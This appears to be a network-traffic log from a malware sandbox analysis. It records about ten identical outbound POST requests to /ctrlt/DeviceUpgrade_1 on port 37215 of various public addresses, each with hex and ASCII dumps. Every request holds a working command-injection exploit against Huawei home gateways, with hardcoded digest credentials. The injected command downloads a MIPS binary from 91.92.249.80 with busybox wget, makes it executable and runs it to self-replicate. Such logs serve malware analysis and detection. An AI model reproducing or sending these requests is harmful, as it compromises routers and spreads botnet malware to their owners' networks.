                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          594192.168.2.2338450197.99.30.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213308096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          595192.168.2.2338068157.59.58.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213352919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          596192.168.2.235834241.100.76.23237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213413954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          597192.168.2.235449264.140.82.13637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213437080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          598192.168.2.2333556197.107.70.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213495970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          599192.168.2.2348904157.202.223.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213509083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          600192.168.2.234097641.255.198.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213509083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          601192.168.2.235552281.133.96.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213512897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          602192.168.2.2344262197.14.108.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213530064 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          603192.168.2.236041041.175.119.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213589907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
